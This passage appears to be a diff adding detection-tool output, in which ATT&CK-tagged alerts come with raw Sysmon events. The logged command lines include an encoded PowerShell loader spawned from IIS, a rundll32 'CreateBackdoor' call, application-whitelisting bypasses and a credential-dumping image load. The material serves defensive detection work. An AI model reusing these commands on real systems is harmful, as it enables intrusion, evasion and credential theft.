+[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
+    </TimeCreated>
+    <EventRecordID>5875</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ProcessId"">2584</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
+    <Data Name=""ParentProcessId"">748</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
+    </TimeCreated>
+    <EventRecordID>243544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
+    <Data Name=""ProcessId"">7836</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot;  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
+    </TimeCreated>
+    <EventRecordID>16507</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
+    <Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
+    <Data Name=""ProcessId"">1528</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
+    <Data Name=""ParentProcessId"">3788</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
+    </TimeCreated>
+    <EventRecordID>243544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
+    <Data Name=""ProcessId"">7836</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot;  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
+    </TimeCreated>
+    <EventRecordID>16507</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
+    <Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
+    <Data Name=""ProcessId"">1528</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
+    <Data Name=""ParentProcessId"">3788</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:29.646278Z"">
+    </TimeCreated>
+    <EventRecordID>4920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:28.893</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-0010349B8800</Data>
+    <Data Name=""ProcessId"">6552</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:13.389836Z"">
+    </TimeCreated>
+    <EventRecordID>19</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:13.309</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
+    <Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
+    <Data Name=""Description"">SAM Library DLL</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
